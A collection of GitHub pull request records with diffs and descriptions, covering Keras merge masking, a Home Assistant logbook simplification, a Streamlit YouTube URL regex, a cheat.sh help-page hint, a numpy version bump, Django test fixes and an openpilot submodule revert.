- raise Exception('Merge does not support masking, ' +
- 'but was passed an input mask: ' + str(mask))
- return None
+ def compute_mask(self, inputs, mask=None):
+ if mask is None or not any([m is not None for m in mask]):
+ return None
+
+ assert hasattr(mask, '__len__') and len(mask) == len(inputs)
+
+ if self.mode in ['sum', 'mul', 'ave']:
+ masks = [K.expand_dims(m, 0) for m in mask if m is not None]
+ return K.all(K.concatenate(masks, axis=0), axis=0, keepdims=False)
+ elif self.mode == 'concat':
+ masks = [K.ones_like(inputs[i][:-1]) if m is None else m for i, m in zip(inputs, mask)]
+ expanded_dims = [K.expand_dims(m) for m in masks]
+ concatenated = K.concatenate(expanded_dims, axis=self.concat_axis)
+ return K.all(concatenated, axis=-1, keepdims=False)
+ elif self.mode in ['cos', 'dot']:
+ return None
+ elif hasattr(self.mode, '__call__'):
+ if hasattr(self._output_mask, '__call__'):
+ return self._output_mask(mask)
+ else:
+ return self._output_mask
+ else:
+ # this should have been caught earlier
+ raise Exception('Invalid merge mode: {}'.format(self.mode))
def get_config(self):
py3 = sys.version_info[0] == 3
@@ -1388,7 +1409,7 @@ def from_config(cls, config):
def merge(inputs, mode='sum', concat_axis=-1,
- dot_axes=-1, output_shape=None, name=None):
+ dot_axes=-1, output_shape=None, output_mask=None, name=None):
'''Functional merge, to apply to Keras tensors (NOT layers).
Returns a Keras tensor.
@@ -1437,6 +1458,7 @@ def merge(inputs, mode='sum', concat_axis=-1,
concat_axis=concat_axis,
dot_axes=dot_axes,
output_shape=output_shape,
+ output_mask=output_mask,
node_indices=node_indices,
tensor_indices=tensor_indices,
name=name)
@@ -1446,6 +1468,7 @@ def merge(inputs, mode='sum', concat_axis=-1,
concat_axis=concat_axis,
dot_axes=dot_axes,
output_shape=output_shape,
+ output_mask=output_mask,
name=name)
return merge_layer(inputs)
diff --git a/keras/layers/core.py b/keras/layers/core.py
index b7c20c4f7bc..75f83f7cd8b 100644
--- a/keras/layers/core.py
+++ b/keras/layers/core.py
@@ -402,6 +402,8 @@ def antirectifier_output_shape(input_shape):
def __init__(self, function, output_shape=None, arguments={}, **kwargs):
self.function = function
self.arguments = arguments
+ self.supports_masking = True
+
if output_shape is None:
self._output_shape = None
elif type(output_shape) in {tuple, list}:
diff --git a/tests/keras/backend/test_backends.py b/tests/keras/backend/test_backends.py
index 465d1dae455..fb4b2647464 100644
--- a/tests/keras/backend/test_backends.py
+++ b/tests/keras/backend/test_backends.py
@@ -139,6 +139,9 @@ def test_elementwise_operations(self):
# does not work yet, wait for bool <-> int casting in TF (coming soon)
# check_single_tensor_operation('any', (4, 2))
# check_single_tensor_operation('any', (4, 2), axis=1, keepdims=True)
+ #
+ # check_single_tensor_operation('any', (4, 2))
+ # check_single_tensor_operation('any', (4, 2), axis=1, keepdims=True)
check_single_tensor_operation('argmax', (4, 2))
check_single_tensor_operation('argmax', (4, 2), axis=1)
diff --git a/tests/keras/layers/test_core.py b/tests/keras/layers/test_core.py
index 281e5ce61af..bbeab907865 100644
--- a/tests/keras/layers/test_core.py
+++ b/tests/keras/layers/test_core.py
@@ -1,6 +1,5 @@
import pytest
import numpy as np
-from numpy.testing import assert_allclose
from keras import backend as K
from keras.layers import core
@@ -84,6 +83,60 @@ def fn_output_shape(tup):
model.compile('rmsprop', 'mse')
+def test_merge_mask_2d():
+ from keras.layers import Input, merge, Masking
+ from keras.models import Model
+
+ rand = lambda *shape: np.asarray(np.random.random(shape) > 0.5, dtype='int32')
+
+ # inputs
+ input_a = Input(shape=(3,))
+ input_b = Input(shape=(3,))
+
+ # masks
+ masked_a = Masking(mask_value=0)(input_a)
+ masked_b = Masking(mask_value=0)(input_b)
+
+ # two different types of merging
+ merged_sum = merge([masked_a, masked_b], mode='sum')
+ merged_concat = merge([masked_a, masked_b], mode='concat', concat_axis=1)
+
+ # test sum
+ model_sum = Model([input_a, input_b], [merged_sum])
+ model_sum.compile(loss='mse', optimizer='sgd')
+ model_sum.fit([rand(2,3), rand(2,3)], [rand(2,3)], nb_epoch=1)
+
+ # test concatenation
+ model_concat = Model([input_a, input_b], [merged_concat])
+ model_concat.compile(loss='mse', optimizer='sgd')
+ model_concat.fit([rand(2,3), rand(2,3)], [rand(2,6)], nb_epoch=1)
+
+
+def test_merge_mask_3d():
+ from keras.layers import Input, merge, Embedding, SimpleRNN
+ from keras.models import Model
+
+ rand = lambda *shape: np.asarray(np.random.random(shape) > 0.5, dtype='int32')
+
+ # embeddings
+ input_a = Input(shape=(3,), dtype='int32')
+ input_b = Input(shape=(3,), dtype='int32')
+ embedding = Embedding(3, 4, mask_zero=True)
+ embedding_a = embedding(input_a)
+ embedding_b = embedding(input_b)
+
+ # rnn
+ rnn = SimpleRNN(3, return_sequences=True)
+ rnn_a = rnn(embedding_a)
+ rnn_b = rnn(embedding_b)
+
+ # concatenation
+ merged_concat = merge([rnn_a, rnn_b], mode='concat', concat_axis=-1)
+ model = Model([input_a, input_b], [merged_concat])
+ model.compile(loss='mse', optimizer='sgd')
+ model.fit([rand(2,3), rand(2,3)], [rand(2,3,6)])
+
+
def test_dropout():
layer_test(core.Dropout,
kwargs={'p': 0.5},
|
I've seen a couple of other people who seem to need masking in merged layers. As far as I can tell, masking is only required for the `'sum'` and `'ave'` modes (and probably lambda functions as well, but those are a case of their own). I've only tested this fork with Theano + Python 2.7, but it seems to be working.
I did notice some weird behavior with the `Masking` layer. If given this data,
```
input a data:
[[ 1. 1. 1.]
[ 1. 1. 1.]]
input b data:
[[ 1. 1. 0.]
[ 0. 0. 0.]]
```
for some model that adds the inputs but masks 0's in the second input,
```
input_a = Input(shape=(3,), dtype='int32')
input_b = Input(shape=(3,), dtype='int32')
masked_b = Masking(mask_value=0)(input_b)
merged = merge([input_a, masked_b], mode='sum')
```
it gives
```
[[ 3. 3. 2.]
[ 0. 0. 0.]]
```
Is this the correct behavior? It was my best guess at what it should be doing. Also, I haven't tried this with `mask_zero` in the `Embedding` layer, which seems like the most common use case.
Also, I'm not sure how to go about adding support for lambda functions, since this also seems useful. I thought maybe adding an `output_mask` parameter that takes a list of (normalized) masks and returns the output mask, but this seems clunky.
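For reference, a NumPy stand-in (not the backend code) for the AND-reduction that `compute_mask` performs for the `'sum'`/`'mul'`/`'ave'` modes:
```python
import numpy as np

mask_a = np.array([[True, True, False]])
mask_b = np.array([[True, False, False]])
# Stack the per-input masks and reduce with logical AND, as in compute_mask.
merged = np.all(np.stack([mask_a, mask_b], axis=0), axis=0)
print(merged.astype(int))  # [[1 0 0]]
```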
|
https://api.github.com/repos/keras-team/keras/pulls/2413
|
2016-04-20T02:13:43Z
|
2016-06-23T19:03:55Z
|
2016-06-23T19:03:55Z
|
2016-10-22T21:27:06Z
| 2,532
|
keras-team/keras
| 47,630
|
Avoid entity registry check in live logbook on each state update
|
diff --git a/homeassistant/components/logbook/helpers.py b/homeassistant/components/logbook/helpers.py
index c2ea9823535818..6bfd88c976a0a1 100644
--- a/homeassistant/components/logbook/helpers.py
+++ b/homeassistant/components/logbook/helpers.py
@@ -171,7 +171,6 @@ def async_subscribe_events(
These are the events we need to listen for to do
the live logbook stream.
"""
- ent_reg = er.async_get(hass)
assert is_callback(target), "target must be a callback"
event_forwarder = event_forwarder_filtered(
target, entities_filter, entity_ids, device_ids
@@ -193,7 +192,7 @@ def _forward_state_events_filtered(event: EventType[EventStateChangedData]) -> N
new_state := event.data["new_state"]
) is None:
return
- if _is_state_filtered(ent_reg, new_state, old_state) or (
+ if _is_state_filtered(new_state, old_state) or (
entities_filter and not entities_filter(new_state.entity_id)
):
return
@@ -232,9 +231,7 @@ def is_sensor_continuous(ent_reg: er.EntityRegistry, entity_id: str) -> bool:
)
-def _is_state_filtered(
- ent_reg: er.EntityRegistry, new_state: State, old_state: State
-) -> bool:
+def _is_state_filtered(new_state: State, old_state: State) -> bool:
"""Check if the logbook should filter a state.
Used when we are in live mode to ensure
@@ -245,7 +242,7 @@ def _is_state_filtered(
or split_entity_id(new_state.entity_id)[0] in ALWAYS_CONTINUOUS_DOMAINS
or new_state.last_changed != new_state.last_updated
or ATTR_UNIT_OF_MEASUREMENT in new_state.attributes
- or is_sensor_continuous(ent_reg, new_state.entity_id)
+ or ATTR_STATE_CLASS in new_state.attributes
)
|
## Proposed change
<!--
Describe the big picture of your changes here to communicate to the
maintainers why we should accept this pull request. If it fixes a bug
or resolves a feature request, be sure to link to that issue in the
additional information section.
-->
There is no need to check the entity registry for the state class, since we already have the state and its attributes.
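A minimal sketch of the simplified check (the attribute name is assumed from the sensor integration):
```python
ATTR_STATE_CLASS = "state_class"  # assumed constant name

def is_continuous(attributes: dict) -> bool:
    # Read the state class straight off the state's attributes, no registry lookup.
    return ATTR_STATE_CLASS in attributes

print(is_continuous({"state_class": "measurement"}))  # True
print(is_continuous({"unit_of_measurement": "°C"}))   # False
```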
## Type of change
<!--
What type of change does your PR introduce to Home Assistant?
NOTE: Please, check only 1! box!
If your PR requires multiple boxes to be checked, you'll most likely need to
split it into multiple PRs. This makes things easier and faster to code review.
-->
- [ ] Dependency upgrade
- [ ] Bugfix (non-breaking change which fixes an issue)
- [ ] New integration (thank you!)
- [ ] New feature (which adds functionality to an existing integration)
- [ ] Deprecation (breaking change to happen in the future)
- [ ] Breaking change (fix/feature causing existing functionality to break)
- [x] Code quality improvements to existing code or addition of tests
## Additional information
<!--
Details are important, and help maintainers processing your PR.
Please be sure to fill out additional details, if applicable.
-->
- This PR fixes or closes issue: fixes #
- This PR is related to issue:
- Link to documentation pull request:
## Checklist
<!--
Put an `x` in the boxes that apply. You can also fill these out after
creating the PR. If you're unsure about any of them, don't hesitate to ask.
We're here to help! This is simply a reminder of what we are going to look
for before merging your code.
-->
- [x] The code change is tested and works locally.
- [ ] Local tests pass. **Your PR cannot be merged unless tests pass**
- [ ] There is no commented out code in this PR.
- [ ] I have followed the [development checklist][dev-checklist]
- [ ] I have followed the [perfect PR recommendations][perfect-pr]
- [ ] The code has been formatted using Ruff (`ruff format homeassistant tests`)
- [ ] Tests have been added to verify that the new code works.
If user exposed functionality or configuration variables are added/changed:
- [ ] Documentation added/updated for [www.home-assistant.io][docs-repository]
If the code communicates with devices, web services, or third-party tools:
- [ ] The [manifest file][manifest-docs] has all fields filled out correctly.
Updated and included derived files by running: `python3 -m script.hassfest`.
- [ ] New or updated dependencies have been added to `requirements_all.txt`.
Updated by running `python3 -m script.gen_requirements_all`.
- [ ] For the updated dependencies - a link to the changelog, or at minimum a diff between library versions is added to the PR description.
- [ ] Untested files have been added to `.coveragerc`.
<!--
This project is very active and we have a high turnover of pull requests.
Unfortunately, the number of incoming pull requests is higher than what our
reviewers can review and merge so there is a long backlog of pull requests
waiting for review. You can help here!
By reviewing another pull request, you will help raise the code quality of
that pull request and the final review will be faster. This way the general
pace of pull request reviews will go up and your wait time will go down.
When picking a pull request to review, try to choose one that hasn't yet
been reviewed.
Thanks for helping out!
-->
To help with the load of incoming pull requests:
- [ ] I have reviewed two other [open pull requests][prs] in this repository.
[prs]: https://github.com/home-assistant/core/pulls?q=is%3Aopen+is%3Apr+-author%3A%40me+-draft%3Atrue+-label%3Awaiting-for-upstream+sort%3Acreated-desc+review%3Anone+-status%3Afailure
<!--
Thank you for contributing <3
Below, some useful links you could explore:
-->
[dev-checklist]: https://developers.home-assistant.io/docs/development_checklist/
[manifest-docs]: https://developers.home-assistant.io/docs/creating_integration_manifest/
[quality-scale]: https://developers.home-assistant.io/docs/integration_quality_scale_index/
[docs-repository]: https://github.com/home-assistant/home-assistant.io
[perfect-pr]: https://developers.home-assistant.io/docs/review-process/#creating-the-perfect-pr
|
https://api.github.com/repos/home-assistant/core/pulls/107622
|
2024-01-09T04:08:09Z
|
2024-01-14T02:04:04Z
|
2024-01-14T02:04:04Z
|
2024-01-15T02:14:05Z
| 434
|
home-assistant/core
| 39,581
|
Change youtube url regex to match youtube urls more formats
|
diff --git a/lib/streamlit/elements/media.py b/lib/streamlit/elements/media.py
index e24082bf4392..d20618ba9ffd 100644
--- a/lib/streamlit/elements/media.py
+++ b/lib/streamlit/elements/media.py
@@ -192,16 +192,10 @@ def dg(self) -> DeltaGenerator:
return cast("DeltaGenerator", self)
-# Regular expression explained at https://regexr.com/4n2l2 Covers any youtube
-# URL (incl. shortlinks and embed links) and extracts its code.
-YOUTUBE_RE: Final = re.compile(
- # Protocol
- r"http(?:s?):\/\/"
- # Domain
- r"(?:www\.)?youtu(?:be\.com|\.be)\/"
- # Path and query string
- r"(?P<watch>(watch\?v=)|embed\/)?(?P<code>[\w\-\_]*)(&(amp;)?[\w\?=]*)?"
-)
+# Regular expression from
+# https://gist.github.com/rodrigoborgesdeoliveira/987683cfbfcc8d800192da1e73adc486?permalink_comment_id=4645864#gistcomment-4645864
+# Covers any youtube URL (incl. shortlinks and embed links) and extracts its video code.
+YOUTUBE_RE: Final = r"^((https?://(?:www\.)?(?:m\.)?youtube\.com))/((?:oembed\?url=https?%3A//(?:www\.)youtube.com/watch\?(?:v%3D)(?P<video_id_1>[\w\-]{10,20})&format=json)|(?:attribution_link\?a=.*watch(?:%3Fv%3D|%3Fv%3D)(?P<video_id_2>[\w\-]{10,20}))(?:%26feature.*))|(https?:)?(\/\/)?((www\.|m\.)?youtube(-nocookie)?\.com\/((watch)?\?(app=desktop&)?(feature=\w*&)?v=|embed\/|v\/|e\/)|youtu\.be\/)(?P<video_id_3>[\w\-]{10,20})"
def _reshape_youtube_url(url: str) -> str | None:
@@ -221,9 +215,14 @@ def _reshape_youtube_url(url: str) -> str | None:
.. output::
https://www.youtube.com/embed/_T8LGqJtuGc
"""
- match = YOUTUBE_RE.match(url)
+ match = re.match(YOUTUBE_RE, url)
if match:
- return "https://www.youtube.com/embed/{code}".format(**match.groupdict())
+ code = (
+ match.group("video_id_1")
+ or match.group("video_id_2")
+ or match.group("video_id_3")
+ )
+ return f"https://www.youtube.com/embed/{code}"
return None
diff --git a/lib/tests/streamlit/elements/video_test.py b/lib/tests/streamlit/elements/video_test.py
index e80359b52ed9..a7ca65f780ec 100644
--- a/lib/tests/streamlit/elements/video_test.py
+++ b/lib/tests/streamlit/elements/video_test.py
@@ -59,11 +59,20 @@ def test_youtube_urls_transformed_to_embed_links(self):
"https://youtu.be/_T8LGqJtuGc",
"https://www.youtube.com/watch?v=kmfC-i9WgH0",
"https://www.youtube.com/embed/sSn4e1lLVpA",
+ "https://youtube.com/e/0TSXM-BGqHU",
+ "https://youtube.com/v/OIQskkX_DK0",
+ # HTTP should also work correctly
+ "http://youtu.be/4sPnOqeUDmk",
+ "http://www.youtube.com/embed/92jUAXBmZyU",
)
yt_embeds = (
"https://www.youtube.com/embed/_T8LGqJtuGc",
"https://www.youtube.com/embed/kmfC-i9WgH0",
"https://www.youtube.com/embed/sSn4e1lLVpA",
+ "https://www.youtube.com/embed/0TSXM-BGqHU",
+ "https://www.youtube.com/embed/OIQskkX_DK0",
+ "https://www.youtube.com/embed/4sPnOqeUDmk",
+ "https://www.youtube.com/embed/92jUAXBmZyU",
)
# url should be transformed into an embed link (or left alone).
for x in range(0, len(yt_urls)):
|
<!--
⚠️ BEFORE CONTRIBUTING PLEASE READ OUR CONTRIBUTING GUIDELINES!
https://github.com/streamlit/streamlit/wiki/Contributing
-->
## Describe your changes
Previously our YouTube regex didn't match some valid YouTube links (e.g. "https://youtube.com/e/0TSXM-BGqHU" or "https://youtube.com/v/OIQskkX_DK0"), which is why we failed to display those videos in Streamlit via `st.video`.
The current regexp covers those cases too.
Also, instead of compiling the regex at import time, we now do that lazily on demand (this should help first-run performance and should not hurt subsequent reruns, because [Python caches regex patterns](https://docs.python.org/3/howto/regex.html#module-level-functions)).
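A minimal sketch of the approach, using a simplified hypothetical pattern rather than the full regex from this PR:
```python
import re

_SIMPLE_YT = (
    r"^https?://(?:www\.)?"
    r"(?:youtu\.be/(?P<video_id_1>[\w\-]{10,20})"
    r"|youtube\.com/watch\?v=(?P<video_id_2>[\w\-]{10,20}))"
)

def reshape_youtube_url(url):
    match = re.match(_SIMPLE_YT, url)  # re caches compiled patterns internally
    if match:
        code = match.group("video_id_1") or match.group("video_id_2")
        return f"https://www.youtube.com/embed/{code}"
    return None

print(reshape_youtube_url("https://youtu.be/_T8LGqJtuGc"))
# https://www.youtube.com/embed/_T8LGqJtuGc
```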
## GitHub Issue Link (if applicable)
## Testing Plan
- Explanation of why no additional tests are needed
- Unit Tests (JS and/or Python) Added
- E2E Tests
- Any manual testing needed?
---
**Contribution License Agreement**
By submitting this pull request you agree that all contributions to this project are made under the Apache 2.0 license.
|
https://api.github.com/repos/streamlit/streamlit/pulls/8221
|
2024-02-29T15:52:49Z
|
2024-03-01T18:51:38Z
|
2024-03-01T18:51:38Z
|
2024-03-01T18:51:42Z
| 1,051
|
streamlit/streamlit
| 21,583
|
Add installation hint for cht.sh (fixes #114)
|
diff --git a/share/firstpage-v2.pnl b/share/firstpage-v2.pnl
index 0d160621..dd2cdc83 100644
--- a/share/firstpage-v2.pnl
+++ b/share/firstpage-v2.pnl
@@ -16,9 +16,9 @@
| $ cht.sh go/f<tab><tab>| | $ cht.sh --shell | | $ cht.sh go zip lists |
| go/for go/func | | cht.sh> help | | Ask any question using |
| $ cht.sh go/for | | ... | | cht.sh or curl cht.sh: |
-| ... | | | | /go/zip+lists |
-| | | | | (use /,+ when curling) |
-| | | | | |
+| ... | | $ curl cht.sh/:cht.sh | | /go/zip+lists |
+| | | #!/bin/sh | | (use /,+ when curling) |
+| | | ... | | |
+---- TAB-completion ----+ +-- interactive shell ---+ +- programming questions-+
+------------------------+ +------------------------+ +------------------------+
| $ curl cht.sh/:help | | $ vim prg.py | | $ time curl cht.sh/ |
@@ -49,7 +49,7 @@ DDDDDDDDDDDDDDDDDDDDDDDDDD DDDDDDDDDDDDDDDDDDDDDDDDDD DDDDDDDDDDDDDDDDDDDDDDDDDD
D $ CCCCCCCCCCCBBBBBBBBBBD D $ CCCCCC BBBBBBB D D $ CCCCCC BBBBBBBBBBBB D
D go/for go/func D D HHHHHHH help D D ask any question using D
D $ cht.sh go/for D D ... D D cht.sh or curl cht.sh: D
-D ... D D D D /goHzipHlists D
+D ... D D $ BBBB CCCCCCCCCCCCCCC D D /goHzipHlists D
D D D D D (use H,H when curling) D
D D D D D D
DDDDDEEEEEEEEEEEEEEEEDDDDD DDDEEEEEEEEEEEEEEEEEEEDDDD DDEEEEEEEEEEEEEEEEEEEEEEDD
|
Fixes #114, not #141.
|
https://api.github.com/repos/chubin/cheat.sh/pulls/130
|
2019-03-10T10:09:12Z
|
2019-03-10T16:58:37Z
|
2019-03-10T16:58:37Z
|
2019-03-11T05:15:51Z
| 532
|
chubin/cheat.sh
| 15,179
|
Bump numpy from 1.23.4 to 1.23.5
|
diff --git a/Hand-Motion-Detection/requirements.txt b/Hand-Motion-Detection/requirements.txt
index 140a0c3ad3..f904226dea 100644
--- a/Hand-Motion-Detection/requirements.txt
+++ b/Hand-Motion-Detection/requirements.txt
@@ -1,3 +1,3 @@
-numpy==1.23.4
+numpy==1.23.5
opencv_python==4.6.0.66
mediapipe==0.8.11
|
Bumps [numpy](https://github.com/numpy/numpy) from 1.23.4 to 1.23.5.
<details>
<summary>Release notes</summary>
<p><em>Sourced from <a href="https://github.com/numpy/numpy/releases">numpy's releases</a>.</em></p>
<blockquote>
<h2>v1.23.5</h2>
<h1>NumPy 1.23.5 Release Notes</h1>
<p>NumPy 1.23.5 is a maintenance release that fixes bugs discovered after
the 1.23.4 release and keeps the build infrastructure current. The
Python versions supported for this release are 3.8-3.11.</p>
<h2>Contributors</h2>
<p>A total of 7 people contributed to this release. People with a "+" by
their names contributed a patch for the first time.</p>
<ul>
<li><a href="https://github.com/DWesl"><code>@DWesl</code></a></li>
<li>Aayush Agrawal +</li>
<li>Adam Knapp +</li>
<li>Charles Harris</li>
<li>Navpreet Singh +</li>
<li>Sebastian Berg</li>
<li>Tania Allard</li>
</ul>
<h2>Pull requests merged</h2>
<p>A total of 10 pull requests were merged for this release.</p>
<ul>
<li><a href="https://github-redirect.dependabot.com/numpy/numpy/pull/22489">#22489</a>: TST, MAINT: Replace most setup with setup_method (also teardown)</li>
<li><a href="https://github-redirect.dependabot.com/numpy/numpy/pull/22490">#22490</a>: MAINT, CI: Switch to cygwin/cygwin-install-action@v2</li>
<li><a href="https://github-redirect.dependabot.com/numpy/numpy/pull/22494">#22494</a>: TST: Make test_partial_iteration_cleanup robust but require leak...</li>
<li><a href="https://github-redirect.dependabot.com/numpy/numpy/pull/22592">#22592</a>: MAINT: Ensure graceful handling of large header sizes</li>
<li><a href="https://github-redirect.dependabot.com/numpy/numpy/pull/22593">#22593</a>: TYP: Spelling alignment for array flag literal</li>
<li><a href="https://github-redirect.dependabot.com/numpy/numpy/pull/22594">#22594</a>: BUG: Fix bounds checking for <code>random.logseries</code></li>
<li><a href="https://github-redirect.dependabot.com/numpy/numpy/pull/22595">#22595</a>: DEV: Update GH actions and Dockerfile for Gitpod</li>
<li><a href="https://github-redirect.dependabot.com/numpy/numpy/pull/22596">#22596</a>: CI: Only fetch in actions/checkout</li>
<li><a href="https://github-redirect.dependabot.com/numpy/numpy/pull/22597">#22597</a>: BUG: Decrement ref count in gentype_reduce if allocated memory...</li>
<li><a href="https://github-redirect.dependabot.com/numpy/numpy/pull/22625">#22625</a>: BUG: Histogramdd breaks on big arrays in Windows</li>
</ul>
<h2>Checksums</h2>
<h3>MD5</h3>
<pre><code>8a412b79d975199cefadb465279fd569 numpy-1.23.5-cp310-cp310-macosx_10_9_x86_64.whl
1b56e8e6a0516c78473657abf0710538 numpy-1.23.5-cp310-cp310-macosx_11_0_arm64.whl
c787f4763c9a5876e86a17f1651ba458 numpy-1.23.5-cp310-cp310-manylinux_2_17_aarch64.manylinux2014_aarch64.whl
db07645022e56747ba3f00c2d742232e numpy-1.23.5-cp310-cp310-manylinux_2_17_x86_64.manylinux2014_x86_64.whl
c63a6fb7cc16a13aabc82ec57ac6bb4d numpy-1.23.5-cp310-cp310-win32.whl
3fea9247e1d812600015641941fa273f numpy-1.23.5-cp310-cp310-win_amd64.whl
4222cfb36e5ac9aec348c81b075e2c05 numpy-1.23.5-cp311-cp311-macosx_10_9_x86_64.whl
6c7102f185b310ac70a62c13d46f04e6 numpy-1.23.5-cp311-cp311-macosx_11_0_arm64.whl
6b7319f66bf7ac01b49e2a32470baf28 numpy-1.23.5-cp311-cp311-manylinux_2_17_aarch64.manylinux2014_aarch64.whl
3c60928ddb1f55163801f06ac2229eb0 numpy-1.23.5-cp311-cp311-manylinux_2_17_x86_64.manylinux2014_x86_64.whl
6936b6bcfd6474acc7a8c162a9393b3c numpy-1.23.5-cp311-cp311-win32.whl
</code></pre>
<!-- raw HTML omitted -->
</blockquote>
<p>... (truncated)</p>
</details>
<details>
<summary>Commits</summary>
<ul>
<li><a href="https://github.com/numpy/numpy/commit/de82cd9468704a033702974010ee7e7efc85b393"><code>de82cd9</code></a> Merge pull request <a href="https://github-redirect.dependabot.com/numpy/numpy/issues/22626">#22626</a> from charris/prepare-1.23.5-release</li>
<li><a href="https://github.com/numpy/numpy/commit/9c7ac340aa4298dbad574fc8bdfc16dfa175d820"><code>9c7ac34</code></a> REL: Prepare for the NumPy 1.23.5 Release.</li>
<li><a href="https://github.com/numpy/numpy/commit/2c4cf9a3c4cff914e3f9d190f42546d3e7c9ff82"><code>2c4cf9a</code></a> Merge pull request <a href="https://github-redirect.dependabot.com/numpy/numpy/issues/22625">#22625</a> from charris/backport-22561</li>
<li><a href="https://github.com/numpy/numpy/commit/dcd9404456e4af37041ee740045e95b10aaa46ad"><code>dcd9404</code></a> BUG: Histogramdd breaks on big arrays in Windows (<a href="https://github-redirect.dependabot.com/numpy/numpy/issues/22561">#22561</a>)</li>
<li><a href="https://github.com/numpy/numpy/commit/bb5e3a671f1fab8bf39346c760cf65009f91bea2"><code>bb5e3a6</code></a> Merge pull request <a href="https://github-redirect.dependabot.com/numpy/numpy/issues/22597">#22597</a> from charris/backport-22557</li>
<li><a href="https://github.com/numpy/numpy/commit/0d3d50045fdb4012e51d47ab95e9fbbbbd08ca00"><code>0d3d500</code></a> Merge pull request <a href="https://github-redirect.dependabot.com/numpy/numpy/issues/22596">#22596</a> from charris/backport-22503</li>
<li><a href="https://github.com/numpy/numpy/commit/38fe21f6cae59326a4b35c5337c78052df153d41"><code>38fe21f</code></a> Merge pull request <a href="https://github-redirect.dependabot.com/numpy/numpy/issues/22595">#22595</a> from charris/backport-22452</li>
<li><a href="https://github.com/numpy/numpy/commit/45329c1ee92d00959d11cdfa0a2c5a25a6867933"><code>45329c1</code></a> Merge pull request <a href="https://github-redirect.dependabot.com/numpy/numpy/issues/22593">#22593</a> from charris/backport-22447</li>
<li><a href="https://github.com/numpy/numpy/commit/3ca02ce5b1a4ec2412cad839d42452a4200a5270"><code>3ca02ce</code></a> Merge pull request <a href="https://github-redirect.dependabot.com/numpy/numpy/issues/22594">#22594</a> from charris/backport-22450</li>
<li><a href="https://github.com/numpy/numpy/commit/8cededdf4eeebd4f1985bd74c11fbf44f367937f"><code>8cededd</code></a> Merge pull request <a href="https://github-redirect.dependabot.com/numpy/numpy/issues/22592">#22592</a> from charris/backport-22393</li>
<li>Additional commits viewable in <a href="https://github.com/numpy/numpy/compare/v1.23.4...v1.23.5">compare view</a></li>
</ul>
</details>
<br />
[](https://docs.github.com/en/github/managing-security-vulnerabilities/about-dependabot-security-updates#about-compatibility-scores)
Dependabot will resolve any conflicts with this PR as long as you don't alter it yourself. You can also trigger a rebase manually by commenting `@dependabot rebase`.
[//]: # (dependabot-automerge-start)
[//]: # (dependabot-automerge-end)
---
<details>
<summary>Dependabot commands and options</summary>
<br />
You can trigger Dependabot actions by commenting on this PR:
- `@dependabot rebase` will rebase this PR
- `@dependabot recreate` will recreate this PR, overwriting any edits that have been made to it
- `@dependabot merge` will merge this PR after your CI passes on it
- `@dependabot squash and merge` will squash and merge this PR after your CI passes on it
- `@dependabot cancel merge` will cancel a previously requested merge and block automerging
- `@dependabot reopen` will reopen this PR if it is closed
- `@dependabot close` will close this PR and stop Dependabot recreating it. You can achieve the same result by closing it manually
- `@dependabot ignore this major version` will close this PR and stop Dependabot creating any more for this major version (unless you reopen the PR or upgrade to it yourself)
- `@dependabot ignore this minor version` will close this PR and stop Dependabot creating any more for this minor version (unless you reopen the PR or upgrade to it yourself)
- `@dependabot ignore this dependency` will close this PR and stop Dependabot creating any more for this dependency (unless you reopen the PR or upgrade to it yourself)
</details>
|
https://api.github.com/repos/geekcomputers/Python/pulls/1796
|
2022-11-21T19:27:03Z
|
2022-12-04T19:47:56Z
|
2022-12-04T19:47:56Z
|
2022-12-04T19:48:13Z
| 117
|
geekcomputers/Python
| 31,535
|
Fixed broken tests on Python 3 after 3c5fc708f1a8f60c05182869f6f3ec13697...
|
diff --git a/tests/modeladmin/tests.py b/tests/modeladmin/tests.py
index f6a250db09834..146c078e592b4 100644
--- a/tests/modeladmin/tests.py
+++ b/tests/modeladmin/tests.py
@@ -552,6 +552,20 @@ def assertIsInvalid(self, model_admin, model, msg,
]
self.assertEqual(errors, expected)
+ def assertIsInvalidRegexp(self, model_admin, model, msg,
+ id=None, hint=None, invalid_obj=None):
+ """
+ Same as assertIsInvalid but treats the given msg as a regexp.
+ """
+ invalid_obj = invalid_obj or model_admin
+ errors = model_admin.check(model=model)
+ self.assertEqual(len(errors), 1)
+ error = errors[0]
+ self.assertEqual(error.hint, hint)
+ self.assertEqual(error.obj, invalid_obj)
+ self.assertEqual(error.id, id)
+ self.assertRegexpMatches(error.msg, msg)
+
def assertIsValid(self, model_admin, model):
errors = model_admin.check(model=model)
expected = []
@@ -1302,9 +1316,9 @@ class ValidationTestInline(object):
class ValidationTestModelAdmin(ModelAdmin):
inlines = [ValidationTestInline]
- self.assertIsInvalid(
+ self.assertIsInvalidRegexp(
ValidationTestModelAdmin, ValidationTestModel,
- "'modeladmin.tests.ValidationTestInline' must inherit from 'BaseModelAdmin'.",
+ r"'.*\.ValidationTestInline' must inherit from 'BaseModelAdmin'\.",
'admin.E104')
def test_missing_model_field(self):
@@ -1314,9 +1328,9 @@ class ValidationTestInline(TabularInline):
class ValidationTestModelAdmin(ModelAdmin):
inlines = [ValidationTestInline]
- self.assertIsInvalid(
+ self.assertIsInvalidRegexp(
ValidationTestModelAdmin, ValidationTestModel,
- "'modeladmin.tests.ValidationTestInline' must have a 'model' attribute.",
+ r"'.*\.ValidationTestInline' must have a 'model' attribute\.",
'admin.E105')
def test_invalid_model_type(self):
@@ -1332,9 +1346,9 @@ class ValidationTestInline(TabularInline):
class ValidationTestModelAdmin(ModelAdmin):
inlines = [ValidationTestInline]
- self.assertIsInvalid(
+ self.assertIsInvalidRegexp(
ValidationTestModelAdmin, ValidationTestModel,
- "The value of 'modeladmin.tests.ValidationTestInline.model' must be a Model.",
+ r"The value of '.*\.ValidationTestInline.model' must be a Model\.",
'admin.E106')
def test_valid_case(self):
|
...bbcf2.
|
https://api.github.com/repos/django/django/pulls/2389
|
2014-03-03T14:39:04Z
|
2014-03-03T14:50:55Z
|
2014-03-03T14:50:55Z
|
2014-07-19T16:00:06Z
| 592
|
django/django
| 51,560
|
Revert "CANPacker: assert no undefined signals (#28942)"
|
diff --git a/opendbc b/opendbc
index b03468a714da2e..3ef35ed2298a3a 160000
--- a/opendbc
+++ b/opendbc
@@ -1 +1 @@
-Subproject commit b03468a714da2eb8ef83f07a373f3f1514491cad
+Subproject commit 3ef35ed2298a3a9d199f9145409547710065884c
|
This reverts commit 13371b07a2fbfe5ea07b245f8b2a0ba938900ccc.
|
https://api.github.com/repos/commaai/openpilot/pulls/29013
|
2023-07-18T05:19:16Z
|
2023-07-18T05:41:39Z
|
2023-07-18T05:41:39Z
|
2023-07-18T05:41:40Z
